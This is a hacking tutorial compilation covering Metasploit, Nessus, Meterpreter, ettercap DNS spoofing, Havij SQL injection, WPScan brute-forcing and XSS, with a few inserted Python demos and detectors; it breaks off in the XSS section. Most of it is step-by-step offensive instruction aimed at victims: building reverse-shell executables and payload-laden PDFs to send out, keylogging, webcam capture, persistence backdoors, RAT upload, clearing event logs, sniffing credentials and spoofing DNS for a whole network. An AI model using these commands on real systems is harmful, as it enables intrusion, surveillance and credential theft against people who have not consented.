1. INFORMATION GATHERING: The name says what it is, but for all the 'l33ts' I will explain it: collecting information about a specific target (which hosts are up, which ports are open, which services and versions are running) is called information gathering. Two of the most widely used tools are:
1. Nmap
2. Nessus
We are briefly going to discuss these two here.
Tool 1: Nmap
Nmap uses raw IP packets to determine whether a host is up or down, whether it is behind a firewall, which ports are open, and what services are running on the remote system and their versions. Nmap's GUI is called Zenmap, but we will not be using that today. msfconsole passes commands it does not recognise to the underlying shell, so you can run nmap straight from the msf prompt without leaving Metasploit (db_nmap does the same and stores the results in the Metasploit database). Open the Metasploit console and type: nmap (target IP address) (options that you want).
For example:
nmap [target IP address here] -sV
(-sV probes each open port and reports the service running there and its version. The more outdated the version, the more likely the system is exploitable.)
Take note of the service names and search for them in Metasploit, e.g.:
search MSRPC
If you are lucky you get a matching exploit; if not, move on to another service or system. You can also go to exploit-db.com and type in the service name and version; if you are lucky the search will return an exploit, which you can then load with 'use' and run with 'exploit' to break into the system.
If the target drops ICMP (a host firewall is on), Nmap may report it as down and skip it. In that case add -Pn, which skips host discovery and scans the ports regardless:
nmap [target IP address here] -sV -Pn
This is the end of the first part of information gathering, using Nmap.









Tool 2: Nessus
Nessus is the world's best known vulnerability scanner for a good reason: it finds vulnerabilities and makes the job much easier, because you can import a Nessus scan into Metasploit, which then matches the findings against its exploits. For that you need to create a database, which I will cover later in this tutorial.
Okay, so let's start! First we need to make an account.
Go here: http://adfoc.us/10187334395300 and register.
The code to activate Nessus will be sent to your email.
Go to the BackTrack console and type:
/opt/nessus/bin/nessus-fetch --register *your code, copied from the email*
Nessus will start fetching the latest plugins. This might take a while, so be patient. Next you want to create a new user. Do this by typing:
/opt/nessus/sbin/nessus-adduser
Now input your username and password. That's it. Now we need to start Nessus itself. In the console, type:
/etc/init.d/nessusd start
You have successfully installed Nessus on BackTrack.
Open the Nessus interface by going to this address in your browser:
http://127.0.0.1:8834/
Input your username and password and you're in. Nessus has some pretty cool features. You can add your own policies by clicking on the Policies tab; there you can enable/disable Nessus scan options.
Let's continue. Click Scans and then hit Add. Input a scan name, a policy and the address(es) that you want to scan.
For a local network scan choose the internal network policy; for scanning over the Internet choose the policy that scans external IPs. After the scan is complete, click on it and then click Download Report. Save it as .nbe; this can later be imported into Metasploit (db_import) for automated exploitation.
Metasploit 2: Exploitation
Exploitation is the main part of the whole process. Here is where you use everything you learned during the information gathering stage. Our main goal is to exploit a system within our network and deliver a payload. So let's look at the commands we will be using.
The 'use' command selects an exploit module. You can imagine it as picking a weapon before getting ready for battle:
use (exploit name)
The exploit name comes from the information gathering stage (the search command above). To view all available exploits, type:
show exploits
After selecting the exploit you need to see which options it takes. Some must be set manually; others have defaults. Whether an option is mandatory is shown in the "Required" column. Type:
show options
Most exploits require RHOST and RPORT; browser-based ones require SRVHOST and SRVPORT instead. RHOST is the remote host: the IP address of the system we are attempting to exploit. RPORT defaults to the standard port of the targeted service and should only be changed if the service is running on a different port.
I will say more about SRVHOST and SRVPORT when I talk about browser-based exploits.
Next we set the payload that the exploit will deliver:
set PAYLOAD (payload name)
Reverse payloads need LHOST (local host) and LPORT (local port): the address the payload connects back to. If you want this to work over the WAN, LPORT has to be forwarded from your router to the attacking machine. All payloads can be viewed by typing:
show payloads
Types of payloads:
There are two types of payload: reverse and bind. A reverse payload runs on the victim and connects back to you; that is why the connection is called "reverse". On the attacker machine a listener (exploit/multi/handler) accepts the incoming connection, and that is how you get your session. Because the victim makes an outbound connection, reverse payloads work through the victim's NAT and most firewalls, which is why they are used far more than bind ones. Payloads can be made persistent by dumping them into the registry; for future sessions you will need to start the listener manually before the victim reconnects.
A bind payload does the opposite: it opens a listening port on the victim machine and the attacker connects to it. The connection is direct, not reverse, so it only works if you can reach that port on the victim, with no NAT or firewall in the way.
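To make the difference concrete, here is an added example (written for this edit, not Metasploit code) that plays both a reverse and a bind connection on 127.0.0.1 with plain sockets. A tiny request loop stands in for Meterpreter and answers only two harmless requests (whoami and sysinfo, mirroring the whoami step earlier in the book) rather than running commands; the point is which side calls connect() and which side calls listen()/accept(). The request names and the port-0 trick are assumptions of this example.

```python
# Added example (not from the original page): reverse_tcp versus bind_tcp with plain sockets.
import getpass
import platform
import socket
import threading


def _user() -> str:
    try:
        return getpass.getuser()
    except Exception:          # no passwd entry in some sandboxes
        return "unknown"


# The stand-in "payload" only answers these fixed requests; it never runs shell commands.
REQUESTS = {
    b"whoami": lambda: f"{platform.node()}\\{_user()}".encode(),
    b"sysinfo": lambda: platform.platform().encode(),
}


def payload_loop(conn: socket.socket) -> None:
    """Victim side: serve requests over whichever channel it was handed, until 'exit'."""
    with conn:
        while True:
            request = conn.recv(1024).strip()
            if not request or request == b"exit":
                return
            conn.sendall(REQUESTS.get(request, lambda: b"unknown request")() + b"\n")


def handler_loop(conn: socket.socket, requests: list) -> dict:
    """Attacker side: send each request, collect the reply, then close the session."""
    replies = {}
    with conn:
        for request in requests:
            conn.sendall(request + b"\n")
            replies[request] = conn.recv(4096).strip()
        conn.sendall(b"exit\n")
    return replies


def _listener() -> socket.socket:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))        # port 0: let the OS pick a free port
    s.listen(1)
    return s


def reverse_tcp(requests: list) -> dict:
    """reverse_tcp: the attacker LISTENS (exploit/multi/handler on LHOST:LPORT) and the
    payload CONNECTS OUT to it, so only an outbound connection from the victim is needed."""
    listener = _listener()
    lhost, lport = listener.getsockname()
    victim = threading.Thread(target=lambda: payload_loop(socket.create_connection((lhost, lport))))
    victim.start()
    conn, _ = listener.accept()
    listener.close()
    replies = handler_loop(conn, requests)
    victim.join()
    return {"tcp_connection_initiated_by": "victim", "replies": replies}


def bind_tcp(requests: list) -> dict:
    """bind_tcp: the payload LISTENS on the victim (RHOST:LPORT) and the attacker CONNECTS
    IN, which fails whenever NAT or a firewall blocks inbound traffic to that port."""
    listener = _listener()
    rhost, rport = listener.getsockname()

    def victim_side():
        conn, _ = listener.accept()
        listener.close()
        payload_loop(conn)

    victim = threading.Thread(target=victim_side)
    victim.start()
    replies = handler_loop(socket.create_connection((rhost, rport)), requests)
    victim.join()
    return {"tcp_connection_initiated_by": "attacker", "replies": replies}
```

Both functions exchange exactly the same requests and replies; the only thing that changes is who dials. That is also why the port-forwarding note below applies to reverse payloads on the attacker's side and to bind payloads on the victim's side.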
Metasploit 3: Creating an Executable Payload
We can also make an executable file and send it to the remote machine. When they run it, we get a Meterpreter connection. This works like a RAT: we create an executable payload containing our IP and port, and when we send it to someone and they run it, it connects back to us. Let's start!
In BackTrack, open a new console and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.139 LPORT=8080 X > /root/Desktop/server.exe
(On current versions msfpayload is gone; the equivalent is msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.139 LPORT=8080 -f exe -o /root/Desktop/server.exe.)
This creates our server. When the target runs it, it will try to connect back to us, so we need to set up a listener that waits for incoming connections and accepts them.
Start the Metasploit console and type:
use exploit/multi/handler
Now let's add the payload. Type:
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and LPORT to the same values you baked into the executable:
set LHOST 192.168.11.139
set LPORT 8080
Then type exploit. The handler starts listening for incoming connections, and when the target runs the file a Meterpreter session is created.
This can also be used outside the LAN. When creating your executable in BackTrack, use your external (public) IP as LHOST. Forward LPORT on your router to your internal IP, and when you set up the listener, set its LHOST to your internal IP, not the external one.
Some of you might still not know what port forwarding is, so let me explain. It means forwarding all incoming connections on a certain port of your router to one machine in your network. Why is it necessary? When a connection arrives from the WAN at your router, the router does not know which internal machine it is for and drops it. Forwarding the port tells it, so the session gets established. Read more here. If you still have no idea what I am talking about, you should study networking before proceeding.
We can inject our payload into formats other than .exe. Here we will use a PDF file-format exploit. It embeds the payload in an existing PDF, and when the PDF is opened it executes the payload as a separate process, leaving the legitimate document intact.
Open a new console and type msfconsole to start Metasploit.
Here is how to use a format other than .exe:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
To see the options we have, type "show options".
INFILENAME is the legitimate PDF document to embed the payload in. Just go and download one, then point the module at it:
set INFILENAME /root/Desktop/YOURFILE.pdf
Set the payload to Meterpreter, set LHOST (and LPORT if you are not using the default 4444) to match the listener below, and run the exploit:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (LHOST)
exploit
The generated PDF is written under ~/.msf4/local/.


Now we need to start a listener, so open a new console and type:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.104 (your LHOST)
exploit
Now send the newly generated PDF to the victim, and when he opens it you get your Meterpreter session.
Metasploit Series 4: Meterpreter
Meterpreter is a famous payload that is injected via reflective DLL injection, so it runs entirely in memory inside an existing process and never touches the disk. It is VERY powerful and has a lot of commands that we will be looking at. Using a Meterpreter session you can even pivot through remote networks and exploit systems inside them as if you had direct access.
Use ps to list active processes and their PIDs.
If we delivered the payload through the browser, we need to move out of the browser process: if the browser gets closed, we lose our session with it. How? Migrate to another process. Let's migrate to explorer.exe (note: this is Windows Explorer, not Internet Explorer). Find the PID of explorer.exe and then type migrate (pid). Once you have migrated to explorer.exe you are reasonably safe, and we can take a screenshot of the desktop or a snapshot from the webcam:
screenshot (screenshot of the desktop)
webcam_snap (snapshot from the webcam)
Next, you can view files and change directories directly from the Meterpreter session using:
ls - similar to 'dir' in DOS
cd - change directory
del - delete a file
rmdir - remove a directory
mkdir - make a directory
NOTE: when you give Windows paths to Meterpreter, escape the backslashes, i.e. use double backslashes (C:\\Users) all the time.
Now let's try to get SYSTEM privileges by typing:
getsystem
This will most likely fail on Windows 7 with UAC enabled: getsystem only escalates from an already elevated (administrator) process, and it tries three techniques in turn (two variants of named-pipe impersonation and token duplication). If it fails, look at the local privilege escalation modules under exploit/windows/local first.
I said previously that Meterpreter has a keylogger. Let's test it. We have to migrate to the explorer.exe process for this to work, because the keylogger only sees keystrokes of the desktop session it runs in.
keyscan_start, then after waiting a while (for the victim to type something) keyscan_dump, which dumps the keystrokes recorded in that time.
Now let's install a backdoor, so that even when he shuts down the PC we get the session back when he boots it again.
NOTE: you will have to start multi/handler to listen for the reconnection.
run persistence -U -i 5 -p (lport) -r (lhost)
Defining the options:
-U : start the backdoor when the user logs in (-X would start it at system boot, which needs admin rights)
-i : interval in seconds between connection attempts; 5 means it tries every 5 seconds
-p : LPORT, the port your handler listens on
-r : LHOST, the IP your handler listens on
(The persistence script has since been deprecated in favour of the post/windows/manage/persistence_exe module, which does the same job.) Then we start the handler with the commands below:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (local IP)
set LPORT (port used)
exploit

Now that it is backdoored, we will always have access to it. However, some of you do not like all this typing and prefer a GUI, so you can upload your own RAT server. The first path is on your attacking machine (Linux), the second is the destination on the victim:
upload /root/YOURRAT.exe C:\\
This uploads our server YOURRAT.exe from /root on our machine to the root of the victim's C: drive. NOTE: if you do not have admin privileges then upload it elsewhere; a good place would be
C:\Users\%username%. Now let's open a command shell with the 'shell' command, navigate to where you uploaded the file and execute it, for example:
cd C:\
start YOURRAT.exe
You can also enable Remote Desktop on the victim with the getgui script (run getgui -u user -p pass), but there is one small problem: on a desktop Windows an RDP login takes over the console session, so the victim notices. Instead I use my personal favourite, VNC: in the Meterpreter session type run vnc, which gives us a view of his desktop without the tension of being caught as an intruder.
We are also able to edit the hosts file through Meterpreter (if you are a regular reader of this page, by now you should know what the hosts file is and what it can do on a system: it overrides DNS for the names listed in it). The command is:
run hostsedit -e *IP of the site you want to redirect to*,*site that you want redirected*
And afterwards, to delete the "evidence" of this from the Windows event logs, we use the clearev command.
Next we will see how to "sniff" for usernames and passwords using Meterpreter. What is sniffing? Imagine a police dog sniffing for drugs or bombs; in our case Meterpreter is the police dog and the usernames and passwords are the drugs and bombs. Let's start sniffing with the commands:
use sniffer
sniffer_start (interface index; sniffer_interfaces lists the victim's interfaces with their numbers)
Now, on the victim side, let's log in to a website.
Wait for some time before dumping the captured traffic with:
sniffer_dump 1 /root/Desktop/name.cap (here the "1" is the interface index)
Now stop the sniffer with sniffer_stop 1; after a while you should see a .cap (pcap) file on your desktop, which you open in Wireshark. Open a new console in BackTrack and type wireshark to load the GUI, open the .cap file from the desktop, and browse through the packets. You will find login credentials only for sites that send them over plain HTTP; sites that use HTTPS (Facebook has done so by default since 2013) encrypt the login, and all you see is TLS.

:::::: DNS SPOOF USING ETTERCAP ::::::

WELL, BY NOW I AM GOING TO ASSUME YOU HAVE AT LEAST A LITTLE
EXPERIENCE WITH BACKTRACK (or just a Linux distro in general).

First find and modify etter.dns to what you want forwarded. You can find it at:
/usr/share/ettercap# pico etter.dns
You can delete everything in the file and replace it with something like this:
* A xxx.xx.xxx.xxx
This will redirect all visited websites to whichever site you want; just make sure
to replace the xxx with the IP address of that site or wherever you want.
After that we need to fire up ettercap with a simple command telling it what and
how to attack. The command will look something like this:
ettercap -i NETWORKINTERFACEHERE -TqM ARP:REMOTE -P dns_spoof /TARGETGATEWAYHERE/ /TARGETMACHINEHERE/
For example, I would type a command like this:
ettercap -i wlan0 -TqM ARP:REMOTE -P dns_spoof /192.168.1.1/ //
This tells ettercap that my network interface is wlan0 (the default wireless
interface), then to use the plugin (-P) dns_spoof; 192.168.1.1 between the first
set of // is my gateway, and leaving the next // blank attacks all hosts between
192.168.1.0 and 192.168.1.254, so basically all computers on this network.
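The ARP:REMOTE man-in-the-middle above works by re-binding the gateway's and the victim's IP addresses to the attacker's MAC. Here is the defender's check for exactly that, as an added example (not part of the original tutorial or of ettercap): it walks a constructed sequence of ARP replies on a 192.168.1.1 gateway segment and flags a binding change or one MAC claiming several IPs. The MAC addresses and hosts are constructed.

```python
"""Detect ARP cache poisoning of the kind ettercap's ARP:REMOTE performs.
Added example for this page; the ARP replies below are constructed, not captured."""
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # the gateway used in the ettercap command above

# Constructed ARP replies as (sender_ip, sender_mac), in arrival order. A real
# deployment would feed these from a packet capture on the LAN segment.
ARP_REPLIES = [
    ("192.168.1.1",  "aa:bb:cc:00:00:01"),  # legitimate gateway
    ("192.168.1.50", "aa:bb:cc:00:00:50"),  # victim workstation
    ("192.168.1.77", "aa:bb:cc:00:00:77"),  # attacker's own host
    ("192.168.1.1",  "aa:bb:cc:00:00:77"),  # gateway IP now bound to attacker's MAC
    ("192.168.1.50", "aa:bb:cc:00:00:77"),  # victim IP also bound to attacker's MAC
]


def analyse_arp(replies, gateway_ip, baseline=None):
    """Return a list of alert strings for a sequence of (ip, mac) ARP replies.

    Two signals are checked:
      * an IP previously seen with one MAC announces another (the gateway and
        the victim are both rewritten this way during an ARP:REMOTE attack);
      * one MAC claiming several IPs, which is how the interposed host looks
        from the rest of the segment.
    `baseline` is an optional {ip: mac} map of known-good bindings, e.g. a
    statically configured gateway entry, so the first spoofed reply is caught.
    """
    alerts = []
    ip_to_mac = dict(baseline or {})
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)

    for ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            severity = "CRITICAL" if ip == gateway_ip else "HIGH"
            alerts.append(f"{severity}: {ip} moved from {previous} to {mac}")
            mac_to_ips[previous].discard(ip)
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"HIGH: {mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for line in analyse_arp(ARP_REPLIES, GATEWAY_IP):
        print(line)
```

With a pinned gateway baseline the very first poisoned reply is reported; without one, the first three replies are accepted as the learned state and only the rebinding that follows is alerted on.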
JAVA SIGNED APPLET
The Java signed applet is also one of my preferred browser exploits. It is pretty much
like the Java Drive By ( http://youtu.be/pT0AlJLYc5s ) but here we use Meterpreter
:D Go ahead and continue reading.
Open a console and in it type:
msfconsole followed by: search signed
This will find the exploit that we want. Type:
use exploit/multi/browser/java_signed_applet
Now let's set the payload to meterpreter.
set payload windows/meterpreter/reverse_tcp
Now simply set LHOST and uripath and you're done.
set LHost 192.168.11.139
set uripath /
exploit

WEBSITE HACKING

Basically, website hacking means gaining undetected or unauthorised access
to someone's website. Whether you then use or misuse its database is a different
matter; accessing the database is the hacking.
The steps involved in hacking a website, or a system in general, are as follows:
1. Reconnaissance (footprinting).
2. Scanning.
3. Ports & Services Enumeration.
4. Vulnerability Assessment.
5. Vulnerability Exploitation.
6. Penetration and Access.
7. Privilege Escalation & owning the box.
8. Erase tracks.
9. Maintaining access.

Each step is explained briefly below.
1. Reconnaissance: It is the process of information gathering and footprinting.
Through this we can collect a lot of information about our target website. Done well,
it gives you more info, and more info makes the website easier to hack.
2. Scanning: This step includes scanning a website for vulnerabilities. In other
words, using high-end tools to scan for loopholes and for the system the host
machine is running. It also refers to finding the open ports.
3. Ports & services enumeration: It simply means finding the service running on a
particular port and checking whether it is vulnerable.
4. Vulnerability assessment and exploitation: It refers to gaining information
about a vulnerability and exploiting it in order to get our work done.
6. Penetration and access: simply accessing the admin's account.

7. Privilege escalation & owning the box: Once exploitation is successful and
you have access to the admin's account, making the website harder to recover. This
may include removing other admin accounts, etc.
8. Erase tracks: As it says, certain log files keep track of every
single access, so in order to stay hidden from the admin we need to erase our tracks.
9. Maintaining access: It simply means backdooring it, that is, creating a
loophole through which we will be able to get in at any time after this.

WEBSITE SCANNING
There are a few important tools for scanning a website for open ports and
vulnerabilities, such as Nmap, Uniscan and Nessus; these are popular and also
the most successful!
Here we start by scanning a particular website using these tools.
UNISCAN: A WEB VULNERABILITY SCANNER TOOL IN BACKTRACK
Uniscan is written in Perl. It is a tool built into BackTrack and used for
web application testing. It is a really good tool for a penetration tester to test a web
application against major vulnerabilities like SQL injection, LFI, RFI, XSS etc. It
also scans the server and maps it for open ports, services, banner grabbing
etc. You could say it is a small package of dynamite.
So now let's move on to using this tool. First open BackTrack, open a
terminal and navigate to the Uniscan directory, i.e.
cd /pentest/web/uniscan




Now run the Uniscan tool with this command:
./uniscan.pl


It will give you options from which you can select according to your needs.

For example, I am going to scan a website using the switches qweds:
./uniscan.pl -u http://www.your_target[dot]com/ -qweds


It will take some time to complete.
You can also use the switches q, w, e, d and s individually. You can also get all output
in a text file with the command below:
./uniscan.pl -u http://www.your_target[dot]com/ -qweds > /root/Desktop/report.txt
You can also see a well-organized report in HTML format in the directory below:
/pentest/web/uniscan/report








NMAP
Nmap is a powerful tool for scanning huge networks, and it is used for various
purposes.
Nmap can also be used to scan websites for open ports and the services
running on them. Although its graphical version, Zenmap, is easier to use, here
I am writing about Nmap.
Nmap, best known as the hacker's best friend, be it ethical or criminal, is one of
the best-known network scanners available today. Today nearly every
hacker uses Nmap as a network scanning tool, and even pen-testing tools are bundled
with Nmap as their basic port scanner. Nmap can scan networks, ports and services and
also grab the OS. This tutorial is written so that everyone should be able
to grasp all the commands and switches given here in a single reading. Do you
think it's impossible? So why not give it a try.

First we divide switches into four types:
1. Synchronous Scans
2. Ping Scans
3. Time Scans
4. Output Type

Synchronous Scan: All synchronous scans start with -s (without quotes); note
that the s denoting synchronous is not capital. A basic synchronous scan
command is written as follows:

nmap -s[synchronous scan type] ip_address
----------------------------------------------
-sT Synchronous TCP scan
-sS Synchronous Stealth scan (This type of scan most of the time goes
undetected by the remote system)

-sF Synchronous FIN Scan (Sends FIN packets with RST flag)
-sX XMAS tree scan (A packet is known as XMAS when all its flags are set)
-sU UDP scan
-sN NULL Scan
-sP Ping Scan
-sO Protocol Scan
-sA ACK Scan
-sW Window Scan
-sR RPC (Remote Procedure Call) Scan
-sL List DNS
-sI IDLE scan (A scan done with a spoofed IP address)

How to remember all synchronous scans: After reading the switch list above you
must have noticed that every type of scan starts with the capitalised first letter of
its own name placed next to -s, except the protocol scan, which uses O. So practically
you don't need to remember anything other than which type of scan you want to
perform, then postfix -s with its capital letter. Isn't that easy? Now suppose you want
to scan aaa.bbb.ccc.ddd for its open ports and DNS entries. Note what you want:
-List DNS, that means L

So this will be your command:
nmap aaa.bbb.ccc.ddd -sL

If you want to scan the UDP protocol then type (the UDP scan switch from the list):
nmap aaa.bbb.ccc.ddd -sU

Note: No two synchronous scans can be combined.
nmap -sS -sU aaa.bbb.ccc.ddd is illegal.

Ping Scan: All ping scans start with -P; note that P is capital and denotes ping.
A basic ping scan command is written as:

nmap -P[ping scan type] ip_address
-------------------------------------
-Pn No Ping
-PT TCP Ping
-PA ACK Ping
-PU UDP Ping
-PO Protocol Scan
-PS Synchronous Ping
-PI ICMP Ping Echo
-PB UDP ICMP timestamp
-PM ICMP Net Mask or Masked Scan

Now note that the option after P is the capitalised first letter of the word's own
name, except for the protocol ping and the timestamp ping. As shown earlier, every
time the p from protocol is replaced by O in the scan type. To remember the timestamp
switch, remember that the last letter p in timestamp looks like B.



Time Scans: Time switches are denoted by capital T.

-T Paranoid 300 seconds between scans
-T Sneaky 15 seconds between scans
-T Polite 4 seconds between scans
-T Normal Runs parallel scans
-T Aggressive 1.25 sec/probe
-T Insane 0.3 sec/probe

To remember the time scans, first we arrange the times in descending order:
300 15 4 - 1.25 0.3

My friend is Paranoid who Sneaks around networks,
300 15
He appears Polite Normally but is Aggressive to the level of Insanity.
4 - 1.25 0.3

I think that will do. All time switches are appended at the end of the nmap command:
nmap aaa.bbb.ccc -sS -T Polite

Output Type: It just formats the output as you want. Always starts with -o:

-oN Normal Output
-oX XML Output
-oG Grepable Output
-oA All Output

I don't think I need to explain how to remember these.

Other Important Switches:
--traceroute works like any other traceroute program
-R Resolve DNS along with the port scan
-v Scan in verbose mode
-O OS Scan
-----------------------------------------------------
So here's an example of building a scan:
1. Create a stealth synchronous scan with normal output and 15 seconds
between each scan. Resolve DNS and use verbose mode.
Ans:
-Scan type synchronous means -s
-Subtype stealth -sS
-Use verbose -sS -v
-Resolve DNS -sS -v -R
-Normal output -sS -v -R -oN scan.txt (-oN takes the name of the output file)
-15 seconds between scans -sS -v -R -oN scan.txt -T Sneaky

So the answer is:
nmap aaa.bbb.ccc -sS -v -R -oN scan.txt -T Sneaky

The following are for you to try yourself:
2. Create a ping protocol scan with 0.3 seconds between scans.
3. Create a synchronous UDP scan with XML output and verbose mode.

- Nmap tutorial by Team IHA





WEBSITE HACKING
Here we will discuss some popular ways of website hacking. It is not going
to be very deep, but it is essential knowledge.
SQL INJECTION (USING HAVIJ)
Havij is a very good SQL injector tool. It is used to hack websites by SQL injection.
Download it from here: http://adfoc.us/10187334395337
SQL injection is one of the most common and most widely used methods of
hacking a website nowadays. SQL (Structured Query Language) is a language used
to communicate with the database of a website. SQL injection is a technique used by
a hacker to insert SQL code into a website in order to get sensitive information from
the database, like usernames and passwords.
Manual SQL injection is quite hard for newbies to understand, so I have decided
to publish this post, in which we will use a tool called "Havij" to carry out our SQL
injection attack!




Havij supports the following databases:
MySQL
MySQL error based
MySQL Blind
MsSQL
MsSQL error based
MsSQL Blind
Ms Access
Ms Access Blind
Oracle
Oracle error based
PostgreSQL
Sybase ( ASE )
Sybase ( ASE ) Blind


Okay, now for this tutorial we will be using a vulnerable website I found recently. Well,
let's get started already!!

Finding the Vulnerable Site:
To find a site vulnerable to SQL injection, just add a single quote ( ' ) after the URL of
the website.
Example: http://www.vulnerablesite.com/index.php?id=12'

If the website loads normally, remains the same or shows a 404 error, that means the
website is not vulnerable to SQL injection. However, if the website shows an error
related to the database or SQL, that means the website is vulnerable to SQL injection,
like this:

Or you can use a Google dork to find vulnerable sites.
The Attack:
Let's say you have now found a vulnerable site and you want to hack it! Now I will show
you step by step the process of SQL injection.
Step 1: Find the SQL injection vulnerability in the site and insert its URL
(like http://www.target.com/index.asp?id=123) in Havij as shown below.


Step 3: Now click on the Analyse button as shown below.



Now if the server is vulnerable, the information about the target will appear and
the columns will appear as shown in the picture below:

Step 4: Now click on the Tables button and then click the Get Tables button from the
column below, as shown below:


Step 5: Now select the tables with sensitive information and click the Get
Columns button. After that, select the Username and Password columns to get the
usernames and passwords and click on the Get Table button.

Countermeasures:

Here are some of the countermeasures you can take to reduce the risk of SQL
injection:

1. Renaming the admin page will make it difficult for a hacker to locate it.
3. Use an intrusion detection system and compose signatures for popular SQL
injection strings.
4. One of the best methods to protect your website against SQL injection attacks is to
disallow special characters in the admin form, though this will make your passwords
more vulnerable to brute-force attacks; you can implement a captcha to prevent
those attacks.
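To show what the countermeasures above are defending against, here is an added example (not from the original post or from Havij): the `' or 1=1 --` login bypass that appears later on this page, run against a query built by string concatenation and against the parameterised query that defeats it, plus a crude signature check of the kind countermeasure 3 calls for. The user table is a constructed in-memory SQLite database.

```python
"""SQL injection login bypass versus parameter binding.
Added example for this page; the account data is constructed."""
import re
import sqlite3


def make_db():
    """Constructed sample data: one account in an in-memory SQLite database.
    Passwords are stored in clear only to keep the example short; the fix being
    shown here is parameter binding, not password storage."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "correct horse"))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Concatenation: the user's text is parsed as SQL. With the password
    `' or 1=1 --` the WHERE clause becomes
        username = 'me' AND password = '' or 1=1 --'
    so the comment swallows the trailing quote and `or 1=1` matches every row."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Parameter binding: values travel separately from the statement text, so
    quotes and comment markers inside them are data, never SQL syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Signature patterns of the kind an IDS/WAF rule would carry (countermeasure 3).
# Signatures are a secondary control: they catch common probes and are easy to
# evade, so they complement binding rather than replace it.
SQLI_SIGNATURES = [
    re.compile(r"'\s*or\s+\S+\s*=\s*\S+", re.I),   # ' or 1=1
    re.compile(r"--\s*$"),                          # trailing SQL comment
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
]


def looks_like_sqli(value):
    """True when a submitted field value matches any known injection signature."""
    return any(p.search(value) for p in SQLI_SIGNATURES)


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"
    print("vulnerable:", login_vulnerable(db, "me", payload))
    print("safe:      ", login_safe(db, "me", payload))
    print("signature: ", looks_like_sqli(payload))
```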








HACK WORDPRESS BLOG USING WPSCAN IN BACKTRACK OR KALI
WPScan.rb is a nifty bit of program that allows you to scan WordPress sites for
information as well as do some fun stuff. Say, for example, you want to "hack" into your
friend's WordPress site :-) ... or just get some information, whatever.

I'm using BackTrack 5 r3 for this tutorial.
Step 1: You can use it to enumerate usernames, so you can see which usernames are
valid on the WordPress site, by running this command:
ruby ./wpscan.rb --url www.friends-site.com --enumerate u



Running this command against a real WordPress site will show something like this:


Step 2:
Now that you know what the usernames are, you can try to brute-force them
with a list of passwords. This process takes a while, and you need a word
list. BackTrack 5 r3 comes with a decent word list, so I'll use that in this example.

ruby ./wpscan.rb --url www.friends-site.com --wordlist /pentest/passwords/wordlists/darkc0de.lst --username admin

The above command tells WPScan to attack your friend's URL using the
username "admin" with the word list located in
the /pentest/passwords/wordlists/ folder of BackTrack 5.
You can even add threading to make the process a little faster with this
switch:
--threads 50
There are a few more things you can do, including scanning for the plugins
the site uses, as well as telling you which ones are vulnerable.
You can see a full list of options here: http://wpscan.org/
Happy WordPress Hacking!!


HACK JOOMLA HOSTED WEBSITE USING JOOMSCAN IN BT OR KALI

Joomscan is a penetration testing tool that helps to find vulnerabilities
in the Joomla CMS. The updated version can detect 550 vulnerabilities. Let me show
how to use Joomscan in BackTrack 5.

Download Joomscan from here:
http://web-center.si/joomscan/joomscan.tar.gz

Step 1: Moving to the PenTest folder
Copy/move the downloaded files into the directory
/pentest/web/scanners/joomscan/



Step 2: Set permissions
Now you have to set permissions on the Joomscan file. To do this, type the
following command in a terminal (if you don't know how to open a terminal at all, please
stop reading this and start from the basics of Linux).
chmod 0777 joomscan.pl




Step 3: Update
Update the scanner to the latest version. To do this, enter the following command in
the terminal:
./joomscan.pl update



Step 4: Scanning for vulnerabilities
Now that everything is OK, we have to scan our Joomla site for vulnerabilities. To do
this, enter the following command in the terminal:
./joomscan.pl -u www.YourJoomlasite.com





Wait for a while, and it will list the vulnerabilities found.

CROSS SITE SCRIPTING (XSS)
Cross-site scripting is a website vulnerability caused by the server blindly
passing on whatever is entered in any form; hence a hacker is able
to inject code into it, and the server serves that code to other people. This
vulnerability may lead to the theft of information from everyone who visits and uses
the website.
Here's a tutorial on XSS!
In a typical XSS attack, a hacker injects his malicious JavaScript code into a
legitimate website. When a user visits the specially crafted link, it executes the
malicious JavaScript. A successfully exploited XSS vulnerability allows attackers to
carry out phishing attacks, steal accounts and even spread worms.

Example: Let us imagine a hacker has discovered an XSS vulnerability in Gmail
and injects a malicious script. When a user visits the site, it executes the malicious
script. The malicious code can be used to redirect users to a fake Gmail page or
capture cookies. Using the stolen cookies, he can log in to your account
and change the password.
It will be easy to understand XSS if you have the following prerequisites:

Strong knowledge of HTML and JavaScript (Reference).
Basic knowledge of the HTTP client-server architecture (Reference)
[optional] Basic knowledge of server-side programming (PHP, ASP, JSP)

XSS Attack:
Step 1: Finding a Vulnerable Website
Hackers use Google dorks for finding vulnerable sites, for instance "?search="
or ".php?q=". 1337 hackers target specific sites instead of using Google search. If you
are going to test your own site, you have to check every page of your site for the
vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find an input field so that we can inject our own script, for
example a search box, username, password or any other input field.



Test 1:
Once we have found the input field, let us try to put some string into the field; for
instance, let me input "BTS". It will display the result.

Now right-click on the page and select View Source. Search for the string "BTS"
which we entered in the input field. Note the location where the input is placed.
